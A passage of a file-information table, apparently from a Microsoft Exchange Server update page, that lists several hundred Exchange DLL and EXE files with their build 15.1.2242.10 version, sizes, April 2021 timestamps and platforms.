28,040| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.directory.topologyservice.exe| 15.1.2242.10| 208,760| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.disklocker.events.dll| 15.1.2242.10| 88,976| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.disklocker.interop.dll| 15.1.2242.10| 32,656| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.drumtesting.calendarmigration.dll| 15.1.2242.10| 45,960| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.drumtesting.common.dll| 15.1.2242.10| 18,824| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.dxstore.dll| 15.1.2242.10| 473,488| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.dxstore.ha.events.dll| 15.1.2242.10| 206,200| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.dxstore.ha.instance.exe| 15.1.2242.10| 36,728| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.eac.flighting.dll| 15.1.2242.10| 131,464| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.edgecredentialsvc.exe| 15.1.2242.10| 21,904| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.edgesync.common.dll| 15.1.2242.10| 148,368| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 15.1.2242.10| 220,040| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.edgesync.eventlog.dll| 15.1.2242.10| 23,952| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.edgesyncsvc.exe| 15.1.2242.10| 97,680| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.ediscovery.export.dll| 15.1.2242.10| 1,266,064| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.ediscovery.export.dll.deploy| 15.1.2242.10| 1,266,064| 27-Apr-21| 12:48| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.application| Not applicable| 16,486| 27-Apr-21| 12:51| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.exe.deploy| 15.1.2242.10| 87,416| 27-Apr-21| 12:49| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.manifest| Not applicable| 67,475| 27-Apr-21| 12:49| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.strings.dll.deploy| 15.1.2242.10| 52,112| 27-Apr-21| 12:48| Not applicable \nMicrosoft.exchange.ediscovery.mailboxsearch.dll| 15.1.2242.10| 294,288| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.entities.birthdaycalendar.dll| 15.1.2242.10| 73,096| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.entities.booking.defaultservicesettings.dll| 15.1.2242.10| 45,968| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.entities.booking.dll| 15.1.2242.10| 218,504| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.entities.booking.management.dll| 15.1.2242.10| 78,200| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.entities.bookings.dll| 15.1.2242.10| 35,704| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.entities.calendaring.dll| 15.1.2242.10| 932,240| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.entities.common.dll| 15.1.2242.10| 336,256| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.entities.connectors.dll| 15.1.2242.10| 52,600| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.entities.contentsubmissions.dll| 15.1.2242.10| 32,136| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.entities.context.dll| 15.1.2242.10| 60,816| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.entities.datamodel.dll| 15.1.2242.10| 854,392| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.entities.fileproviders.dll| 15.1.2242.10| 291,720| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.entities.foldersharing.dll| 15.1.2242.10| 39,304| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.entities.holidaycalendars.dll| 15.1.2242.10| 76,152| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.entities.insights.dll| 15.1.2242.10| 166,800| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.entities.meetinglocation.dll| 15.1.2242.10| 1,486,712| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.entities.meetingparticipants.dll| 15.1.2242.10| 122,232| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.entities.meetingtimecandidates.dll| 15.1.2242.10| #########| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.entities.onlinemeetings.dll| 15.1.2242.10| 264,056| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.entities.people.dll| 15.1.2242.10| 37,776| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.entities.peopleinsights.dll| 15.1.2242.10| 186,744| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.entities.reminders.dll| 15.1.2242.10| 64,376| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.entities.schedules.dll| 15.1.2242.10| 83,848| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.entities.shellservice.dll| 15.1.2242.10| 63,872| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.entities.tasks.dll| 15.1.2242.10| 100,240| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.entities.xrm.dll| 15.1.2242.10| 144,760| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.entityextraction.calendar.dll| 15.1.2242.10| 270,208| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.eserepl.common.dll| 15.1.2242.10| 15,224| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.eserepl.configuration.dll| 15.1.2242.10| 15,736| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.eserepl.dll| 15.1.2242.10| 130,424| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.ews.configuration.dll| 15.1.2242.10| 254,344| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.exchangecertificate.eventlog.dll| 15.1.2242.10| 13,176| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.exchangecertificateservicelet.dll| 15.1.2242.10| 37,264| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.extensibility.internal.dll| 15.1.2242.10| 640,912| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.extensibility.partner.dll| 15.1.2242.10| 37,240| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.federateddirectory.dll| 15.1.2242.10| 146,312| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.ffosynclogmsg.dll| 15.1.2242.10| 13,200| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.frontendhttpproxy.dll| 15.1.2242.10| 594,320| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.frontendhttpproxy.eventlogs.dll| 15.1.2242.10| 14,712| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.frontendtransport.monitoring.dll| 15.1.2242.10| 30,088| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.griffin.variantconfiguration.dll| 15.1.2242.10| 99,720| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.hathirdpartyreplication.dll| 15.1.2242.10| 42,384| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.helpprovider.dll| 15.1.2242.10| 40,328| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.httpproxy.addressfinder.dll| 15.1.2242.10| 54,136| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.httpproxy.common.dll| 15.1.2242.10| 163,720| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.httpproxy.diagnostics.dll| 15.1.2242.10| 58,752| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.httpproxy.flighting.dll| 15.1.2242.10| 204,168| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.httpproxy.passivemonitor.dll| 15.1.2242.10| 17,808| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.httpproxy.proxyassistant.dll| 15.1.2242.10| 30,584| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.httpproxy.routerefresher.dll| 15.1.2242.10| 38,776| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.httpproxy.routeselector.dll| 15.1.2242.10| 48,520| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.httpproxy.routing.dll| 15.1.2242.10| 180,616| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.httpredirectmodules.dll| 15.1.2242.10| 36,744| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.httputilities.dll| 15.1.2242.10| 25,992| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.hygiene.data.dll| 15.1.2242.10| 1,868,152| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.hygiene.diagnosisutil.dll| 15.1.2242.10| 54,648| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.hygiene.eopinstantprovisioning.dll| 15.1.2242.10| 35,720| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.idserialization.dll| 15.1.2242.10| 35,704| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.imap4.eventlog.dll| 15.1.2242.10| 18,320| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.imap4.eventlog.dll.fe| 15.1.2242.10| 18,320| 27-Apr-21| 12:50| Not applicable \nMicrosoft.exchange.imap4.exe| 15.1.2242.10| 263,032| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.imap4.exe.fe| 15.1.2242.10| 263,032| 27-Apr-21| 12:50| Not applicable \nMicrosoft.exchange.imap4service.exe| 15.1.2242.10| 24,960| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.imap4service.exe.fe| 15.1.2242.10| 24,960| 27-Apr-21| 12:50| Not applicable \nMicrosoft.exchange.imapconfiguration.dl1| 15.1.2242.10| 53,128| 27-Apr-21| 12:48| Not applicable \nMicrosoft.exchange.inference.common.dll| 15.1.2242.10| 216,976| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.inference.hashtagsrelevance.dll| 15.1.2242.10| 32,144| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.inference.peoplerelevance.dll| 15.1.2242.10| 282,000| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.inference.ranking.dll| 15.1.2242.10| 18,832| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.inference.safetylibrary.dll| 15.1.2242.10| 83,848| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.inference.service.eventlog.dll| 15.1.2242.10| 15,248| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 15.1.2242.10| 94,096| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.infoworker.common.dll| 15.1.2242.10| 1,840,504| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.infoworker.eventlog.dll| 15.1.2242.10| 71,544| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 15.1.2242.10| 175,504| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.instantmessaging.dll| 15.1.2242.10| 45,968| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.irm.formprotector.dll| 15.1.2242.10| 159,624| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.irm.msoprotector.dll| 15.1.2242.10| 51,080| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.irm.ofcprotector.dll| 15.1.2242.10| 45,944| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.isam.databasemanager.dll| 15.1.2242.10| 30,600| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.isam.esebcli.dll| 15.1.2242.10| 100,216| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.jobqueue.eventlog.dll| 15.1.2242.10| 13,192| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.jobqueueservicelet.dll| 15.1.2242.10| 271,224| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.killswitch.dll| 15.1.2242.10| 22,408| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.killswitchconfiguration.dll| 15.1.2242.10| 33,656| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.loganalyzer.analyzers.auditing.dll| 15.1.2242.10| 18,320| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.loganalyzer.analyzers.certificatelog.dll| 15.1.2242.10| 15,248| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll| 15.1.2242.10| 27,536| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.loganalyzer.analyzers.easlog.dll| 15.1.2242.10| 30,592| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ecplog.dll| 15.1.2242.10| 22,416| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.loganalyzer.analyzers.eventlog.dll| 15.1.2242.10| 66,440| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ewslog.dll| 15.1.2242.10| 29,560| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll| 15.1.2242.10| 19,848| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.loganalyzer.analyzers.groupescalationlog.dll| 15.1.2242.10| 20,344| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.loganalyzer.analyzers.httpproxylog.dll| 15.1.2242.10| 19,336| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.loganalyzer.analyzers.hxservicelog.dll| 15.1.2242.10| 34,192| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.loganalyzer.analyzers.iislog.dll| 15.1.2242.10| 103,816| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.loganalyzer.analyzers.lameventlog.dll| 15.1.2242.10| 31,616| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.loganalyzer.analyzers.migrationlog.dll| 15.1.2242.10| 15,736| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll| 15.1.2242.10| 20,872| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oauthcafelog.dll| 15.1.2242.10| 16,248| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.loganalyzer.analyzers.outlookservicelog.dll| 15.1.2242.10| 49,032| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owaclientlog.dll| 15.1.2242.10| 44,424| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owalog.dll| 15.1.2242.10| 38,288| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.loganalyzer.analyzers.perflog.dll| 15.1.2242.10| #########| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.loganalyzer.analyzers.pfassistantlog.dll| 15.1.2242.10| 29,072| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.loganalyzer.analyzers.rca.dll| 15.1.2242.10| 21,368| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.loganalyzer.analyzers.restlog.dll| 15.1.2242.10| 24,456| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.loganalyzer.analyzers.store.dll| 15.1.2242.10| 15,240| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll| 15.1.2242.10| 21,904| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.loganalyzer.core.dll| 15.1.2242.10| 89,480| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.loganalyzer.extensions.auditing.dll| 15.1.2242.10| 20,872| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.loganalyzer.extensions.certificatelog.dll| 15.1.2242.10| 26,488| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.loganalyzer.extensions.cmdletinfralog.dll| 15.1.2242.10| 21,368| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.loganalyzer.extensions.common.dll| 15.1.2242.10| 28,048| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.loganalyzer.extensions.easlog.dll| 15.1.2242.10| 28,536| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.loganalyzer.extensions.errordetection.dll| 15.1.2242.10| 36,216| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.loganalyzer.extensions.ewslog.dll| 15.1.2242.10| 16,760| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.loganalyzer.extensions.griffinperfcounter.dll| 15.1.2242.10| 19,848| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.loganalyzer.extensions.groupescalationlog.dll| 15.1.2242.10| 15,224| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.loganalyzer.extensions.httpproxylog.dll| 15.1.2242.10| 17,272| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.loganalyzer.extensions.hxservicelog.dll| 15.1.2242.10| 19,832| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.loganalyzer.extensions.iislog.dll| 15.1.2242.10| 57,232| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.loganalyzer.extensions.migrationlog.dll| 15.1.2242.10| 17,784| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.loganalyzer.extensions.oabdownloadlog.dll| 15.1.2242.10| 18,824| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.loganalyzer.extensions.oauthcafelog.dll| 15.1.2242.10| 16,256| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.loganalyzer.extensions.outlookservicelog.dll| 15.1.2242.10| 17,784| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.loganalyzer.extensions.owaclientlog.dll| 15.1.2242.10| 15,224| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.loganalyzer.extensions.owalog.dll| 15.1.2242.10| 15,240| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.loganalyzer.extensions.perflog.dll| 15.1.2242.10| 52,616| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.loganalyzer.extensions.pfassistantlog.dll| 15.1.2242.10| 18,312| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.loganalyzer.extensions.rca.dll| 15.1.2242.10| 34,192| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.loganalyzer.extensions.restlog.dll| 15.1.2242.10| 17,288| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.loganalyzer.extensions.store.dll| 15.1.2242.10| 18,808| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll| 15.1.2242.10| 43,400| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.loguploader.dll| 15.1.2242.10| 165,240| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.loguploaderproxy.dll| 15.1.2242.10| 54,664| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxassistants.assistants.dll| 15.1.2242.10| 9,060,744| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxassistants.attachmentthumbnail.dll| 15.1.2242.10| 33,160| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxassistants.common.dll| 15.1.2242.10| 124,304| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxassistants.crimsonevents.dll| 15.1.2242.10| 82,808| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.mailboxassistants.eventlog.dll| 15.1.2242.10| 14,224| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.mailboxassistants.rightsmanagement.dll| 15.1.2242.10| 30,088| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxloadbalance.dll| 15.1.2242.10| 661,376| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxloadbalance.serverstrings.dll| 15.1.2242.10| 63,352| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll| 15.1.2242.10| 175,496| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 15.1.2242.10| 2,784,144| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.mailboxreplicationservice.complianceprovider.dll| 15.1.2242.10| 53,128| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxreplicationservice.contactsyncprovider.dll| 15.1.2242.10| 151,936| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxreplicationservice.dll| 15.1.2242.10| 966,032| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxreplicationservice.easprovider.dll| 15.1.2242.10| 185,224| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.mailboxreplicationservice.eventlog.dll| 15.1.2242.10| 31,632| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.mailboxreplicationservice.googledocprovider.dll| 15.1.2242.10| 39,816| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxreplicationservice.imapprovider.dll| 15.1.2242.10| 105,856| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxreplicationservice.mapiprovider.dll| 15.1.2242.10| 94,600| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxreplicationservice.popprovider.dll| 15.1.2242.10| 43,400| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 15.1.2242.10| 18,808| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 15.1.2242.10| 172,944| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxreplicationservice.pstprovider.dll| 15.1.2242.10| 102,792| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxreplicationservice.remoteprovider.dll| 15.1.2242.10| 98,696| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxreplicationservice.storageprovider.dll| 15.1.2242.10| 188,288| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxreplicationservice.syncprovider.dll| 15.1.2242.10| 43,400| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxreplicationservice.xml.dll| 15.1.2242.10| 447,360| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.mailboxreplicationservice.xrmprovider.dll| 15.1.2242.10| 89,976| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxtransport.monitoring.dll| 15.1.2242.10| 107,912| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxtransport.storedriveragents.dll| 15.1.2242.10| 371,064| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.mailboxtransport.storedrivercommon.dll| 15.1.2242.10| 193,920| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.dll| 15.1.2242.10| 551,824| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll| 15.1.2242.10| 16,264| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.mailboxtransport.submission.eventlog.dll| 15.1.2242.10| 15,760| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.dll| 15.1.2242.10| 321,400| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll| 15.1.2242.10| 17,784| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.mailboxtransport.syncdelivery.dll| 15.1.2242.10| 45,432| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.dll| 15.1.2242.10| 18,296| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll| 15.1.2242.10| 12,688| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.managedlexruntime.mppgruntime.dll| 15.1.2242.10| 20,872| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.management.activedirectory.dll| 15.1.2242.10| 415,112| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.management.classificationdefinitions.dll| 15.1.2242.10| 1,269,648| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.management.compliancepolicy.dll| 15.1.2242.10| 39,296| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.management.controlpanel.basics.dll| 15.1.2242.10| 433,552| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.management.controlpanel.dll| 15.1.2242.10| 4,563,320| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.management.controlpanel.owaoptionstrings.dll| 15.1.2242.10| 261,000| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.management.controlpanelmsg.dll| 15.1.2242.10| 33,656| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.management.deployment.analysis.dll| 15.1.2242.10| 94,088| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.management.deployment.dll| 15.1.2242.10| 591,240| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.management.deployment.xml.dll| 15.1.2242.10| 3,560,832| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.management.detailstemplates.dll| 15.1.2242.10| 67,976| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.management.dll| 15.1.2242.10| #########| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.management.edge.systemmanager.dll| 15.1.2242.10| 58,744| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.management.infrastructure.asynchronoustask.dll| 15.1.2242.10| 23,952| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.management.jitprovisioning.dll| 15.1.2242.10| 101,768| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.management.migration.dll| 15.1.2242.10| 544,136| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.management.mobility.dll| 15.1.2242.10| 305,040| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.management.nativeresources.dll| 15.1.2242.10| 131,984| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.management.powershell.support.dll| 15.1.2242.10| 418,704| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.management.provisioning.dll| 15.1.2242.10| 275,848| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.management.psdirectinvoke.dll| 15.1.2242.10| 70,544| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.management.rbacdefinition.dll| 15.1.2242.10| 7,873,928| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.management.recipient.dll| 15.1.2242.10| 1,500,560| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.management.reportingwebservice.dll| 15.1.2242.10| 145,288| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.management.reportingwebservice.eventlog.dll| 15.1.2242.10| 13,688| 27-Apr-21| 12:49| x64 \nMicrosoft.exchange.management.snapin.esm.dll| 15.1.2242.10| 71,560| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.management.systemmanager.dll| 15.1.2242.10| 1,249,168| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.management.transport.dll| 15.1.2242.10| 1,876,344| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.managementgui.dll| 15.1.2242.10| 5,225,856| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.managementmsg.dll| 15.1.2242.10| 36,240| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.mapihttpclient.dll| 15.1.2242.10| 117,624| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.mapihttphandler.dll| 15.1.2242.10| 209,784| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.messagesecurity.dll| 15.1.2242.10| 79,760| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.messagesecurity.messagesecuritymsg.dll| 15.1.2242.10| 17,296| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.messagingpolicies.dlppolicyagent.dll| 15.1.2242.10| 156,040| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 15.1.2242.10| 65,920| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.messagingpolicies.eventlog.dll| 15.1.2242.10| 30,584| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.messagingpolicies.filtering.dll| 15.1.2242.10| 58,232| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.messagingpolicies.hygienerules.dll| 15.1.2242.10| 29,568| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 15.1.2242.10| 175,496| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 15.1.2242.10| 28,552| 27-Apr-21| 12:51| x86 \nMicrosoft.exchange.messagingpolicies.retentionpolicyagent.dll| 15.1.2242.10| 75,152| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 15.1.2242.10| 207,248| 27-Apr-21| 12:51| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 15.1.2242.10| 440,720| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.messagingpolicies.supervisoryreviewagent.dll| 15.1.2242.10| 83,320| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 15.1.2242.10| 35,208| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.messagingpolicies.unifiedpolicycommon.dll| 15.1.2242.10| 53,128| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.messagingpolicies.unjournalagent.dll| 15.1.2242.10| 96,648| 27-Apr-21| 12:51| x86 \nMicrosoft.exchange.migration.dll| 15.1.2242.10| 1,110,408| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.migrationworkflowservice.eventlog.dll| 15.1.2242.10| 14,736| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.mobiledriver.dll| 